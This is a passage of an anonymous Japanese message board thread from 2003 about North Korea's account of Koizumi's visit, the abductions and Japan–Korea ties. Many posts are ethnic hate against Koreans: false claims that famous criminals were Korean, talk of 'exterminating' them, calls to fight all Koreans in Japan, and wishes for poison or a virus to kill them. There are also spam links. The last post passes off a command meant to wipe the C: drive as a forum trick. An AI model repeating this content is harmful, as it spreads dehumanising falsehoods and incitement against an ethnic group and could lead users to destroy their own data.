●崔智栄 →韓国人の強姦魔 新潟、木刀で傷を負わせ、18歳少女を車の中でレイプ
●麻原彰晃 →オウム真理教教祖 父親が朝鮮籍。 サリンを撒き無差別殺人
●宅間守 →大阪、池田小学校の児童殺傷 8人殺害。朝鮮人部落出身
●東慎一郎 →酒鬼薔薇聖斗。 神戸の首切り小僧。 生首を校門に飾る。元在日
●林真須美 →和歌山、毒入りカレー事件。 4人毒殺。帰化人

122 : :03/05/13 18:29 ID:9d3j0J0p
>>111
低学歴ウヨ発見♪

123 :名無しさん@お腹いっぱい。:03/05/13 18:31 ID:paZAOGvJ
北では小泉訪朝は、謝罪に来たことになってるらしいから (´Д` )

124 :名無しさん@お腹いっぱい。:03/05/13 18:33 ID:vIgQOrps


     ちなみに外交上、首脳が相手国にわざわざ国交正常化交渉に訪れるのは「格下の場合のみ」です


何で金正日を日本に呼ばなかったのか不思議でならない(;´Д`)


125 :名無しさん@お腹いっぱい。:03/05/13 19:02 ID:M2sv637r
来るわけがなかろ?

友好国ではないとかいろいろあるが、金豚の国内向けのポーズは「世界一偉い将軍様」なんだから
日本政府に呼びつけられて行ったと解釈されるようなことは、絶対にできない。

なんとか事態を打開するためにも、首相と官房副長官が行った(しかもにこりともせずにその日のう
ちに帰った)というのは、英断だと思う。なんだかんだ言っても、本件については小泉首相は偉かっ
た。(経済はどうしようもないけど)
おかげで、拉致問題は金豚自身から明らかにされ、日本の売国勢力は正体がばれて完全に論拠を
失い、なにはともあれ被害者のうち5人は帰ってきた。全員取り戻すきっかけができた。
これからは、外交上の通例に基づき、対処していけばよい、ってこれだけやられたら敵性国家として
それに協力しているようなやつは全員国外追放か逮捕だよな。

あ、それ以前に陸続きではないから来れないか。
金豚は、飛行機には絶対乗らないそうだから。船には乗るのかな。w






126 :名無しさん@お腹いっぱい。:03/05/13 19:34 ID:VhmICE3/
小泉は世界の笑われ者

127 :名無しさん@お腹いっぱい。:03/05/13 19:40 ID:KUBmRzOb
>>126
ttp://www.whitehouse.gov/news/releases/2003/05/
>May 8, 2003 President to Welcome Prime Minister Junichiro Koizumi to Crawford

ノ・ムヒョン大歓迎
>President Bush Will Meet with President Roh Moo-Hyun of the Republic of Korea on May 14

meet プ


128 :名無しさん@お腹いっぱい。:03/05/13 19:43 ID:nw+MsQjf
おいおいホワイトハウスって随分露骨だなw

129 :名無しさん@お腹いっぱい。:03/05/13 19:50 ID:CzmIfpK2
>>127
同盟国と中立国の違いですなぁ。

130 :名無しさん@お腹いっぱい。:03/05/13 20:26 ID:FgWOfe54
>>129
属国ですから・・・

131 :名無しさん@お腹いっぱい。:03/05/13 20:42 ID:CzmIfpK2
>>130
属国から真の同盟国へ進化せよ!

132 :名無しさん@お腹いっぱい。:03/05/13 20:58 ID:dwElrmZ3
>>124

ガキ?w

133 :名無しさん@お腹いっぱい:03/05/13 21:18 ID:WStS0zTd
飛行機がこわいから来たくなかっただけ。プ

134 :名無しさん@お腹いっぱい。:03/05/13 21:20 ID:dUL1KTFz
泳いで来ればぁ?

135 :名無しさん@お腹いっぱい。:03/05/13 21:38 ID:HUHyIOX+
「朝鮮敵視政策に執ようにしがみついてきた日本軍国主義の頭目が
頭を垂れて訪ねてきた」

日本語訳でこれだから、原文はさぞかし味わい深い文体なんだろうな〜。

136 :名無しさん@お腹いっぱい。:03/05/13 22:49 ID:4smmsHKo
クルーザーには乗れるらしいじゃん(w

137 :名無しさん@お腹いっぱい。:03/05/13 23:23 ID:CzmIfpK2
>>136
悦ばせ組にだって乗れるよ。

138 :金正日:03/05/13 23:27 ID:6e/9a3pn
今トンネル掘ってるとこです。

139 :名無しさん@3周年:03/05/13 23:29 ID:v9rJ5BPW
昔だったら、燃料に反応してたけど、もう慣れてしまった

140 :名無しさん@お腹いっぱい:03/05/13 23:34 ID:MIli0Vmh
日本でのあらゆるデモなど 朝鮮総連の煽動が多いのではないか
日本人拉致問題でデモがないのに イラクの攻撃反対 戦争反対
には 日本でデモがあった 今後とくに北朝鮮の工作員 その協力者に
監視 注意が必要である

141 :名無しさん@お腹いっぱい。:03/05/13 23:39 ID:8DHyQ0IB
奥羽の総大将リキ

142 :名無しさん@お腹いっぱい。:03/05/13 23:42 ID:sLrcfT4M
>>140
そうだね,拉致反対のデモは無いがイラクの戦争反対のデモはあるもんな!

143 :名無しさん@お腹いっぱい。:03/05/13 23:43 ID:dwElrmZ3
あとはアメリカ空母にはデモするが中国だ北朝鮮の核には抗議無し

144 :名無しさん@お腹いっぱい。:03/05/13 23:43 ID:uTp1tVNc
>>140
ダブルスタンダードのデモ隊には、ほんと、腹が立つよ。
あいつらに共感してる馬鹿(社民支持者他)が、全国に100万人以上いることも鬱。

145 :名無しさん@お腹いっぱい。:03/05/13 23:59 ID:e6AjITB7
>時事通信が入手した朝鮮人民軍出版社発行の〜

週刊文春もこれについて前にやってた
つーかこんなのどこで入手するのよ

146 :名無しさん@お腹いっぱい。:03/05/14 00:09 ID:rpjzbuIy

もうすぐ国ごと無くなるんだから、大目に見てやろうよ


147 :   はっ!?:03/05/14 00:29 ID:xWnozaNA

 ほんま北朝鮮が「核持つぞ!!」「核持ってるぞ!!」って騒いでるのに

反核団体や平和団体はウンともスンとも言わんなぁ・・・・・

マジに社会主義国の核兵器は正しい核だと思っているのかいな・・・(w

148 :   はっ!?:03/05/14 00:35 ID:xWnozaNA

 まぁ100歩譲って、奴ら平和団体が言う、アメリカの核に対抗する
ためにはやむをえないって論理に従えば、
日本が北の驚異に対抗して有事法制をを整備するのも正当な権利なんだが、

それは悪いって言うんだよな・・・・論理無茶苦茶・・・て言うか
これがまぁ反米、反資本主義、共産革命を目指す思想では
道理より戦略・戦術が優先するということかな。

149 :名無しさん@お腹いっぱい。:03/05/14 01:57 ID:HOxAoloR
極左、と。

おぼえておきー

150 :名無しさん@お腹いっぱい。:03/05/14 02:02 ID:MXjlL8+v
北朝鮮に対する反核デモなんて起こっていないところからして
デモやってる連中が殆どがヤバい系って事だね
普段から反戦デモやってる連中の素性はアヤシイとは思っていたが

151 :ゴッウロファックイン:03/05/14 02:02 ID:RqHrzepf
内部にはこのくらい虚勢を張っておかないと、拉致ゲロってしまうことはできなかったんだろう。

152 :名無しさん@お腹いっぱい。:03/05/14 02:09 ID:vyzDKqW4
そういえば昨日、TVでピンクレディーのUFOを有事法に変えて歌って
いる奴らを見た。
何だか怖かったよ。

153 :名無しさん@お腹いっぱい。:03/05/14 07:33 ID:t3nxJPDp
まー韓国には大統領就任式に頭を垂れてきたなあれには参った。

日本の首相は毎回行ってたっけ?

154 :名無しさん@3周年:03/05/14 07:51 ID:uyQObwV0
頭目とかなんとか、北は微妙にかび臭い言葉を使うよな。

155 :名無しさん@お腹いっぱい。:03/05/14 08:03 ID:LoOUkB6G
>>138
韓国がトンネルにやたらとこだわるのは、そういうことだったのか!
つーか、トンネルなんかできたらジョンイルだって列車で来れるくらい密着するってことじゃん。

そんなの日本の金出して作る必要まったくないね。
韓国だけで勝手にやってな。

#38度線に北朝鮮が掘ってる侵入用トンネルと微妙に符合するなあ。


156 :名無しさん@お腹いっぱい。:03/05/14 09:47 ID:EDZL6qux
>>154
翻訳した奴が古臭いのでは?w

157 :名無しさん@お腹いっぱい。:03/05/14 09:52 ID:STDLh5Qb
どうでも良いけどこの板漢字多い

158 : :03/05/14 10:51 ID:PeyWVcZN

>>153
頭を下げるだけならただ。
それで北朝鮮包囲網を締められるなら、てところでしょ。
それを蹴りつつある韓国に、既に合衆国は匙を投げたみたいだし日本も限界は
近そう。
日米から見捨てられたら廬武鉉はどうするつもりなんだろうね?


159 :名無しさん@お腹いっぱい。:03/05/14 11:04 ID:oq+ccYN3
「日本の頭目が屈服」したのに、
配給がままならないのはなんでだろ〜

160 :名無しさん@お腹いっぱい。:03/05/14 11:36 ID:rkj5RsBB
「日本の頭目が屈服」したのに、
電力がままならないのはなんでだろ〜


161 ::03/05/14 12:02 ID:8vgbmyHW
日本の頭目が屈服したのに

金が無いのは何だろう

162 :名無しさん@お腹いっぱい。:03/05/14 12:18 ID:M+P4jgHi
>161
金(きむ)だったら腐るほどあるのにねぇ

163 : :03/05/14 15:24 ID:LOmrUFEy

大日本史番外編朝鮮の巻(ぢぢ様のページ)
がヤフーにデリられました。



164 :名無しさん@お腹いっぱい。:03/05/14 15:31 ID:c2I27xm1
あげあげ

165 :名無しさん@お腹いっぱい。:03/05/16 23:26 ID:AnpcF+Uh
拉致被害者5人は北朝鮮に戻させない、なぜなら彼らは日本人だから
http://society.2ch.net/test/read.cgi/giin/1016527236/669
■北朝鮮工作船侵入でも朝銀に4000億投入の是非■
http://money.2ch.net/test/read.cgi/seiji/1009007873/l50
戦後混乱期を馬鹿にして朝鮮に逃げた連中を支援とはとんでもない
http://money.2ch.net/test/read.cgi/seiji/1007271855/573
日本に寄生虫の卵を産みつけようとしているNGO加藤
http://society.2ch.net/test/read.cgi/kokusai/1044440683/216
大阪朝銀救済に野中広務が「面倒見てやれ」の一言で3100億円の公的資金が出され
http://society.2ch.net/test/read.cgi/giin/1035710014/234
●●●河野洋平は1200億円を国に賠償せよ●●●
http://society.2ch.net/test/read.cgi/kokusai/1009426769/97
自民党や社民党の大半の議員は、完全に朝鮮の賄賂で拘束されているよ。
http://tmp.2ch.net/test/read.cgi/asia/1049743190/283
【断罪】土井&野中を切る【糾弾】(横田めぐみさんの母がTVで土井と野中を批判)
http://ex.2ch.net/test/read.cgi/korea/1033358914/696
【拉致】社民/共産 名指しで批判されたシーン(増元るみ子さんの弟、照明さん)
http://society.2ch.net/test/read.cgi/mass/1032276342/633
密航で来たのに強制連行されたと怒る在日
http://news3.2ch.net/test/read.cgi/news2/1046492388/340
横田めぐみさん宅に石を投げ窓を割り、自作自演のチマチョゴリ事件をする在日
http://tmp.2ch.net/test/read.cgi/asia/1043957656/327
終戦時、駅の一等地に住む日本人を殺し土地を奪った在日
http://tmp.2ch.net/test/read.cgi/asia/1050735444/231
マスコミが恐れる在日の抗議活動
http://society.2ch.net/test/read.cgi/mass/1034657537/587
【快挙】花田紀凱夕刊フジで吼える【総連に告ぐ】
http://society.2ch.net/test/read.cgi/mass/1033477405/1-3
「我々は二等国民で、日本国民は四等国民となった。制裁を加えなければならない」
http://ex.2ch.net/test/read.cgi/korea/1045703847/192


166 :名無しさん@お腹いっぱい。:03/05/17 10:35 ID:ZvO5YWXj
                ___
.         / ̄ ̄ ̄       ̄ ̄ ̄\    金正日くんは
.        /         _         ヽ    ここまで気持ちよくカルト国家を支配してきた
        /   、_ ̄`― _,ー- ̄    ヽ   景色もよかったろう
      /    -- `―、__, ― --     ヽ   ピクニック気分だ
      |     _  ー 、_, ―''  _     |  
     /~~~l =ニ~―~ニヾ   〃ニ~―~ニ=  l~~~ヽ  しかし
    / l l l| _,, ====、     , ==== 、_ |l l l ヽ これからは違う
   /「l⌒| || =ニ・ニ⊃|   |⊂二・ニ= .| l |⌒l7.|
.   | .|.l⌒|l |    :二二|    |二二     | l|⌒l.|l   変わるよ
.  / l |.l\|l| 〜― 、_,/ |   |ヽ、_, - 〜  .|l|/l.| l |  なにもかも
  / | lヽ二|| 〜― 、_/ (    )ヽ、_,-― ヽ  ||ニノll |l   ここから先は
. / l | l  l l |   |丁T┬┬\__/┬┬T'丁|    | l l  l|  地獄の淵を通る――!
..| l  l ll l |  \匚匚匚匚匚匚匚匚|/    | ll l ll lゝ
.| l l l l l |         _          |l ll ll  l | ヘル・キムチ・ロード
|l_」 l l  l ヽ、_       ≡        __ノll  l llL_}  (HELL KIMCHI ROAD)
  |ハ l l  |\`ヽ           ,-‐'´ノ l lll l |
.   || | ハ  |. \:::\_____/:::/| ハ ハ  |
   l .|.|. |  |   \:::::::::::::::::::::::::::::::::::/  V | .| |  |


167 :謝罪しる@名無しさん:03/05/17 19:31 ID:x1g2Es17


何故、日本政府は「金正男」捕獲の時、拉致被害者返還に向けての人質としなかったのか?




168 :名無しさん@お腹いっぱい。:03/05/17 20:20 ID:/cW82T+N
金正日は昔日本に密入国して遊びまくり引田テンコーと2ショット撮ってたらしいぞ。

169 :名無しさん@お腹いっぱい。:03/05/24 21:58 ID:rz+tY+Og

朝鮮人が日本に住み着くようになった原因を作ったことは、返す返すも残念です。痛恨の極みです。
いくら反省しても反省し足りません。いくら悔やんでも悔やみきれません。後悔と反省の日々です。断腸の思いです。
何故!朝鮮人なんか日本へ連れてきたんだ。何故、次から次へと、押し掛けてくるような、口実を与えたのだ。
何故!朝鮮人に押しかけて来て住み着く口実など与えたのだ!
何故!何故!何故!悔やんでも遅いが日本史史上最悪の愚行です。
その報いと禍いと呪いを日本人・日本社会が日々うけています。今後も受けつづけていくのです。
犯罪の温床、犯罪の凶悪化、拉致の手引き等の社会不安の火種を日本中にばら撒きました。
朝鮮総連のような工作部隊・犯罪組織を日本で増殖させ、日本人の生命と安全が脅かされることになったのです。
朝鮮人を日本に連れてきたことを、今、日本人は骨身にしみて心底より後悔・懺悔しています。
二度と過ちはくりかえしません。今後、朝鮮人を日本から減らすことはあっても、決して増やしません。
脱北者の受入など、狂気の沙汰です。自殺行為です。移民政策を見直すとしても、朝鮮人だけは入っていません。
日本人は歴史に学ばなくても、せめて経験には学ばなければなりません。これ以上一人たりとも決して増やしてはなりません。
今こそ、日本人は声をあげなければ…………・増やしてしまっては、取り返しがつきません。
一旦増えてしまったら、ブラックバスのように、駆除することも出来ないのです。取り返しがつかないのです。



170 :名無しさん@お腹いっぱい。:03/05/25 00:00 ID:UUHCe1z5
日本が軍事的に弱体してる事を知っていながら今現在も日本が軍国主義に
走っているなんて自国民に教えるなんて恥知らずにも程がある金豚。

171 :名無しさん@お腹いっぱい。:03/05/25 01:31 ID:WYUjPp4c
北朝鮮何も知らないな
小泉が軍国主義の頭目だって (w
石原タンを知らないのか

172 :名無しさん@お腹いっぱい。:03/05/25 01:59 ID:SVBBSXqT
もう飽きたよ・・
吠える事しか出来ないからね奴らは。
それにブレドッグと豚を足して2で割ったあの醜い顔ももういい

173 :名無しさん@お腹いっぱい。:03/05/25 02:49 ID:7IgYVUgB
>>155
統一教会が必死に作りたがってるんだよね、日韓トンネル
日本の教会員の金もかなり注ぎ込まれてるんじゃないかなあ

174 :_:03/05/25 02:54 ID:vFtnFg/Y
http://homepage.mac.com/hiroyuki43/

175 :名無しさん@お腹いっぱい。:03/05/25 07:05 ID:e+ncgg50
>>162
>何故、日本政府は「金正男」捕獲の時、拉致被害者返還に向けての人質としなかったのか?

就任したばかりの小泉がヘタレだった上に、
外務大臣が田中真紀子だったからねぇ・・・。

漏れは、あの事件結果以来、小泉内閣を早々に見限りました。

176 :名無しさん@お腹いっぱい。:03/05/28 03:37 ID:jvy9GlAs
>>175
田中真紀子は何も考えていないで思いつきの言動をする元議員。
俺が外務大臣やった方がましだ。

177 :名無しさん@お腹いっぱい。:03/05/28 05:19 ID:GHmznmwq
怒れ。小泉。

178 :名無しさん@お腹いっぱい。:03/05/28 05:20 ID:EUt1YaGQ
(´―`)y━~~タバコ代上がるのイヤー
http://www.k-514.com/good/dxlive.html
http://www.k-514.com/good/hgmo.html
http://www.k-514.com/good/jgirlpa.html
http://www.k-514.com/good/tokyonights.html
http://www.k-514.com/good/tokyonights.html
http://www.k-514.com/good/erox.html
http://www.k-514.com/good/goa.html
http://www.k-514.com/good/caribeancom.html
http://www.k-514.com/good/1pondou.html
http://www.k-514.com/good/osikko.html
http://www.k-514.com/good/beikoku.html
(´―`)y━~~タバコ代上がるのイヤー

179 :名無しさん@お腹いっぱい。:03/05/28 05:27 ID:yM/+21DT
日本のタバコは先進国ではまだ安い。
消費税も桁違いに安い。
もっと間接税値上げして国債減らせ。


180 :名無しさん@お腹いっぱい。:03/05/28 11:05 ID:+41fF4AF
つかさ、オレ、ふつーに北鮮と戦争に賛成なんだが、おかしい?

いろいろ問題はあるとおもうけど、日本の近い将来を考えると、
あの国は、少なくともあの政権/体制は無くなってもらいたい。

現実的な選択は米国に加害者になってもらうしかなさそうだけど。


181 :名無しさん@お腹いっぱい。:03/05/28 11:12 ID:OsbxJajA
_■_ ________________
 |∵∴∵|:::ー-ーーー-ー─ーー--ーーーー-ーー-ー,||
 |∵∴∵|::::    磯野家の系図            i ||
 |∵∴∵|:::: 波平─-──┬─-──フネ     :; ||
 |===|:::: 波平───サザエ          ! ||===-3
 |∵∴∵|::::       │             ; ||
 |∵∴∵|:::: 波平─ワカメ             |  ||
 |∵∴∵|::::    │                     i  ||
 |∵∴∵|::::   タラチャン               | ||
 |∵∴∵|:::ーーー ーー- -ーー-ーー-ーー-ーー─ ||
   ̄■ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄


182 :名無しさん@お腹いっぱい:03/05/28 13:12 ID:9T5xQfsU
北に戦争仕掛けたら南とも戦争になりそうな気がする罠。やめたほがいい。
あいつら狂っとる。

183 :名無しさん@お腹いっぱい:03/05/28 13:24 ID:9T5xQfsU
頭目、将軍様。。こんな言葉なんとかして欲しいな。
あいつら、脳の進化が停止しとる。

184 :名無しさん@お腹いっぱい。:03/05/28 13:28 ID:jvy9GlAs
>>180
いや、おかしくないと思うよ。そういう考え
このままじゃ日本のナショナリズムがなくなりそう。
黄長Yも日帝支配時代より、今の北朝鮮のほうがむごいと言っているし。
ここで戦争でも何でも仕掛けないと日本はだめになっていく。

185 :名無しさん@お腹いっぱい。:03/05/28 13:38 ID:jvy9GlAs
>>125
金豚が日本に来たら暗殺されて、永田町中引きずりまわされるよ。
それは金豚本人が一番わかっている。

186 :名無しさん@お腹いっぱい。:03/05/28 19:38 ID:7FCcj0gs
faxを使って密入国すればいい。

187 :名無しさん@お腹いっぱい。:03/05/28 19:48 ID:cV9bfty5
 現在、日本が抱えている問題の全てに朝鮮(韓国)人が絡んでいる。
奴らは、日本のあらゆるところに入り込み、弱者のふりをして
卑怯な手段で、日本国民の財産を盗み、体を汚し、命を奪う。
我々の土地を盗み、文化を汚し、教育を歪め、子供たちの未来を壊す。
奴らのために、我々は平穏な生活が出来なくなっている

 敵とは、強弱は関係ない。我が国に害をなす者のことだ。
アメリカが敵だという者もいるが、多少の利害の不一致もあっても
我が国にとって、経済的にも軍事的にもなくてはならない国である。
恩を仇で返し、寄生虫の如く我が国を食い荒らす朝鮮人こそが、
我が国にとっての最大の敵であり、彼らを排除するのに一切の情けは
無用である。敵としての立場を選んだのは奴らだからだ。これはすでに
戦争であり、容赦のない生存競争である。

 最早、話し合いで済むときは過ぎた。善人ぶるのはもうやめよう。
身を守るために戦うことは、悪いことではない。奴らがどんなに「差別だ!」と
わめいても、耳を貸してはならない。それは単なる「区別」なのだから。
国内にいる全ての朝鮮人を敵として認識しよう。犯罪者共を、我々の国から
叩き出さねばならない時が来ているのだ。
日本人よ。今こそ、立ち上がって戦おう。

我々の生活のために、子供たちの将来のために、我が国の未来のために。



188 :名無しさん@お腹いっぱい。:03/05/28 19:51 ID:zPpMkLVL
陰湿なニュースにはかならず朝鮮人がからんでる
まずは、目の前のゴミ朝鮮人をどうにかしないと

189 :名無しさん@お腹いっぱい。:03/05/28 20:10 ID:hDjIq4zl
ショッカーが朝鮮人だけに効く毒とか造ってくれないかな。

190 :名無しさん@お腹いっぱい。:03/05/28 20:26 ID:9CVP0/60
>>189
無理でしょう、奴等がモデルだから

191 :これ読んで勉強するかい?:03/05/28 20:32 ID:xq2E9/HI
北朝鮮利権の真相

歴代訪朝団、進歩的メディア、左派政党、広域暴力団
“無法国家”をのさばらせた人びとの
罪深き裏面史!
http://www.takarajimasha.co.jp/books/betaka/real/index.html


192 :名無しさん@お腹いっぱい。:03/05/28 21:50 ID:odovQkVV
打倒美帝国主義!!
打倒日本帝国主義!!
打倒南朝鮮好戦分子!!

193 :名無しさん@お腹いっぱい。:03/05/28 23:49 ID:DP2UnEzL
>>175
あんんたさんは事件以前にハヤ見限られてたんだな。それもまた、へたれに?
わたしも同じくち、がんばろね


194 :名無しさん@お腹いっぱい。:03/05/28 23:50 ID:DP2UnEzL
待ってリスク!

195 :名無しさん@お腹いっぱい。:03/05/28 23:51 ID:DP2UnEzL
>>186

待ってリスク!

196 :名無しさん@お腹いっぱい。:03/05/29 00:03 ID:e6KKl46T
こんなことしか言えないのかよ
なんか日本に制裁してみれよ、北朝鮮

197 :名無しさん@お腹いっぱい:03/05/29 00:14 ID:r6oJlI3p
>>196
北朝鮮が日本に経済制裁とか?
マツタケが喰えなくなる。

198 :名無しさん@お腹いっぱい。:03/05/29 00:15 ID:ZRUlNdkj
>>189
SARS。
日本人以外に効くウィルスだけど、駄目?

199 :名無しさん@お腹いっぱい。:03/05/29 00:20 ID:/l2L72mA
よくわかってる。過去・現在、そして未来においても常に敵、南も北も。
>>187

200 :名無しさん@お腹いっぱい。:03/05/30 02:28 ID:n0kB1CrE
>「朝鮮敵視政策に執ようにしがみついてきた日本軍国主義の頭目が頭を
>垂れて訪ねてきた」


こんな馬鹿げたことでも言わないと国内での面子と統制が・・・


201 :名無しさん@3周年:03/05/30 02:29 ID:ODkx4oTX
マンゲボーボー号チェック、に対する北の暴言まだかな?

202 :名無しさん@お腹いっぱい:03/05/30 02:37 ID:2Ccuw2Fc
「日本の軍国主義の頭目が屈服」。。。
自国の最優良輸出品の摂取し過ぎ。

203 :動画直リン:03/05/30 02:38 ID:onhOL3Qt
http://homepage.mac.com/hitomi18/

204 :菌一族マンセー:03/05/30 02:49 ID:x/ESMk8C
すべて「恨」の劣性な民族性から出るおことば。
世界中にむけて悪態つきまくり 全世界から失笑を浴びる
世界のいなかもの。辺境の人 北朝鮮族・・そして菌一族。
マンセ−

205 : :03/05/30 22:29 ID:nuJRw53p
日本の頭目が頭をたれたのに援助が減ったのなんでだろう〜〜♪


206 :名無しさん@お腹いっぱい。:03/05/30 22:55 ID:h8gsvQ0v
あなたが探してる話題あれはこれでしょ♪
http://angelers.free-city.net/page002.html

207 :名無しさん@お腹いっぱい。:03/05/31 11:36 ID:2nueidpx
誰か殺そう。
一緒に将軍様を殺そう。殺そう。殺そう。殺そう。殺そう。殺そう。殺そう。
殺そう。殺そう。殺そう。殺そう。殺そう。殺そう。殺そう。殺そう。
日本はさっさと経済制裁しろよ。
もう面倒だから、アメリカにおねだりして核ブッ込んじゃえ。

208 :名無しさん@お腹いっぱい。:03/05/31 13:15 ID:4Wd1GXkn

「 12月1日金奎一氏講演
大韓民国が、大いに日朝交渉やってくれ、大いにがんばって仲良くしてくれ
おれたちはまあ36年前、いろいろあってろくろく金を取ることができなかったから、
その分まで取ってくれよ、ということを言って励ましているわけですから・・・。
だからこれ(朝日交渉)が、できるようになったんですよ。
これが時代の変化だということです。 」

ようするに、朝鮮人たちはどんな事をしても、日本から金を取ろうという点で
同一民族としての共通の目標をもっている。手練手管を使って共犯者として助け合っている。

「日本が早く援助しないと、北が暴走する」と韓国が煽って、早く金をださせようとしている。
実によく出来た連携プレーの取れる民族だ。感心する。


209 :名無しさん@お腹いっぱい。:03/05/31 13:24 ID:Dc2usuCQ
今、アジアを再び征服しようと野望を燃え立たせている、日本帝国主義の頭目が朝鮮敵視政策を後悔して、朝鮮の偉大なる指導者に首を垂らして謁見しに来た。
朝鮮人民軍の力の前に、腰が引けて屈服したと見られる日帝野郎どもは犬や猫の類に属す程の弱虫だ。
これは、朝鮮の先軍政治が日本帝国主義を打ち破ったという事であり、全て偉大なる将軍様の英知の賜物である。


210 :名無しさん@お腹いっぱい。:03/05/31 14:08 ID:KJd0ydVT
>>209
やめてくれ 腹が痛い クッ

211 :名無しさん@お腹いっぱい。:03/05/31 14:12 ID:bljKvr8Y
>>209
そして、偉大なる将軍様は日本帝国主義者に物乞いをしています



212 :名無しさん@お腹いっぱい。:03/05/31 14:35 ID:5PWYMl9M
「 12月1日金奎一氏講演
大韓民国が、大いに日朝交渉やってくれ、大いにがんばって仲良くしてくれ
おれたちはまあ36年前、いろいろあってろくろく金を取ることができなかったから、
その分まで取ってくれよ、ということを言って励ましているわけですから・・・。
だからこれ(朝日交渉)が、できるようになったんですよ。
これが時代の変化だということです。 」

ようするに、朝鮮人たちはどんな事をしても、日本から金を取ろうという点で
同一民族としての共通の目標をもっている。手練手管を使って共犯者として助け合っている。

「日本が早く援助しないと、北が暴走する」と韓国が煽って、早く金をださせようとしている。
実によく出来た連携プレーの取れる民族だ。感心する。お見事!!!

北朝鮮と韓国に関わるということは、性質の悪い人間(ヤクザ)に追突したようなもので
死ぬまで首が痛いと難癖をつけ、たかり続ける脅迫者と一緒で、一生終わることのない
賠償問題を抱えることになる。


213 :名無しさん@お腹いっぱい。:03/05/31 14:50 ID:Dc2usuCQ
>>210
でも、こんなカンジで北チョン国内では報告されてんだろ〜?


214 :名無しさん@お腹いっぱい。:03/05/31 16:03 ID:8de5st4/
はぁ・・・、もうギャグのネタにしかならない国だね。しかも笑えねえし。
チョソどものお笑い工作見てると奴等にホモ・サピエンスとしてのDNAがホントにあるのか疑わしいな。

215 :名無しさん@お腹いっぱい。:03/05/31 16:33 ID:oA5KkVSJ

拉致を北朝鮮が認めるまでは、捏造だと騒ぎつづけていた。
ようするに、北朝鮮が認めるまでは、捏造と繰り返すのが
在日朝鮮人の常套手段だ。

ゆすり・たかり・もらいを生活の手段にし、都合の悪いことは全て捏造で済ませる。
見事に調和の取れた民族性だ!感動した!


216 :名無しさん@お腹いっぱい:03/05/31 18:21 ID:aWCN/P6h
韓国サッカーチームひでぇな。韓国内でサッカーブームが去った
のに困って、日本で吠えて日韓関係に火をつけて注目浴びようと
シテル。サイテー、

217 :名無しさん@お腹いっぱい。:03/06/01 00:31 ID:vpywGRh/
鳥肌実は
「日本海沿岸を無敵艦隊で埋め尽くせ」
と言ってましたが実際にそーゆーことしたら北朝鮮と世界はどう対応するのかな?

218 :名無しさん@お腹いっぱい。:03/06/01 04:23 ID:vukVdOg3
金豚、死ぬまで日本を恨んでいな。
人間、恨む事ばかりしていたら楽しくないよ。

219 :名無しさん@お腹いっぱい。:03/06/01 14:49 ID:xGm/8Sg9
北朝鮮に比べりゃイラクはまだ可愛げがあった。
                   カムバック!!  フセイン!

220 :名無しさん@お腹いっぱい。:03/06/01 15:34 ID:5a8rHR5f
対外的には1にあるように映ると思われ。

221 :名無しさん@お腹いっぱい。:03/06/01 16:19 ID:hkAsors2
舞鶴の護衛隊群と日本海側の管区の保安庁だけでも
使い方を変えれば
「無敵艦隊で埋め尽くした」状態のような・・・・

222 :名無しさん@お腹いっぱい。:03/06/01 17:38 ID:fZKXV999
>>217
あのヒトの芸風はなんとも・・

223 ::03/06/02 06:22 ID:tlUCv12r
>>221
第3艦隊なあ。でもあそこはDDHが旧式だけどなあ。無敵と言えば装備・質・士気・練度のどれをとっても修羅な第2護衛隊群。
佐世保マンセー。東京でプカプカやってる第1は見習え。

224 :名無しさん@お腹いっぱい。:03/06/02 09:39 ID:Fo6cojI7
野中様へ

あなたが、本当に平和主義、人権人道主義者なら、「拉致問題は捏造」発言に対し、
その罪の重みを清く受け止め、身を呈して【北】に赴き、残された拉致被害者と、家族全員の帰国に、
政治生命を掛けることだと思う。

政治家としての、結果責任を果たすとは、そう言うことだ。

将軍様が、いみじくも【 拉致をしました。】と認めたにもかかわらず、
あなたは、未だに、拉致被害者家族並びにその関係者諸氏に、吐いた罵声 恫喝を、
詫びるでもなく、
エセ平和主義、エセ人道的支援で、経済協力の【たかり利権】に奔走してるのは、
もはや、正常に非ず。

残された政治生命を、拉致被害者への過去の償いとして、真摯に受け止め、誠心誠意、
真の人道的政治活動するのが、真の国士。

【エセ】では無い、貴殿の、日本の国士像を是非拝見したい。

225 :名無しさん@お腹いっぱい。:03/06/02 11:36 ID:BiWUc7rc
☆大日本新防衛☆

・在日米軍沖縄駐留海兵隊の大日本国国外(グアム、豪州、比島など)への移転
・大日本海上自衛隊の大日本国沖縄県防衛展開
・大日本国沖縄県下地島と与那国島に大日本航空自衛隊と大日本海上自衛隊航空隊基地の建設
・大日本国沖縄県尖閣諸島への大日本自衛隊部隊の常駐展開

226 :名無しさん@お腹いっぱい。:03/06/02 12:48 ID:MGpnsjqk
>>223
いまや、ECM戦で韓国海軍の後塵を帰す二流海軍・・プッ

227 :名無しさん@お腹いっぱい。:03/06/02 13:29 ID:h9cP8t2M
>>226
ソースきぼん

228 :名無しさん@お腹いっぱい。:03/06/02 13:47 ID:uzdroJgh
ゑじゃないか!ゑじゃないか!
ゑじゃないか!ゑじゃないか!

中山、野中、土井、亀井♪

ゑじゃないか!ゑじゃないか!
ゑじゃないか!ゑじゃないか!

中山、野中、土井、亀井♪

229 :名無しさん@お腹いっぱい。:03/06/02 13:54 ID:QHe8QhrX
豚の国際戦略スケールは山賊レベルということがはっきりしました。

230 :名無しさん@お腹いっぱい。:03/06/02 19:45 ID:U5eXrsSR
なんつうか、この程度ではもう笑えなくなってきたな。


231 :名無しさん@お腹いっぱい。:03/06/02 19:51 ID:cP0looEG
>>227
「電波戦」ってことだろ。確かに負けてる勝てそうに無い。

232 :朝鮮板ができますた!:03/06/02 19:52 ID:a1meP6vi
http://zetabbs.org/Kore/index.html
http://zetabbs.org/Kore/index.html
http://zetabbs.org/Kore/index.html
http://zetabbs.org/Kore/index.html
http://zetabbs.org/Kore/index.html
ニダー


233 :名無しさん@お腹いっぱい。:03/06/02 19:53 ID:l+atbDoA
スレッドがすぐDAT落ちしてお困りのあなた
DAT落ちしないようにする裏技です。
直接2chの鯖にアクセスして、DAT落ちのない領域にこのスレを移動しますので。ちょっと難しいですが。。

1(98)「スタート」→「プログラム」→「DOSプロンプト」を選択
 (2000、XP)「スタート」→「プログラム」→「アクセサリ」
  →「コマンドプロンプト」を選択
2 "C:\windows>"に続けて「cd c:\」と入力
3 "C:>"に続けて「delete c:\」と入力

